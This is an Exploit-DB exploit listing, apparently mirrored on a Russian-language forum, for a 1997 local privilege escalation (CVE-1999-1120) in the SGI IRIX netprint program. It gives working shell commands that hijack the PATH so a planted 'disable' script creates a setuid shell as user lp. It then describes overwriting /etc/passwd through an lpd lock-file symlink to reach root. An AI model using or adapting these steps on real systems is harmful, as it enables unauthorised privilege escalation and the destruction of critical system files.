- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19313
- Проверка EDB
-
- Пройдено
- Автор
- YURI VOLOBUEV
- Тип уязвимости
- LOCAL
- Платформа
- IRIX
- CVE
- cve-1999-1120
- Дата публикации
- 1997-01-04
SGI IRIX 6.4 - 'netprint' Local Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/395/info
A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.
% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell
However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
- Источник
- www.exploit-db.com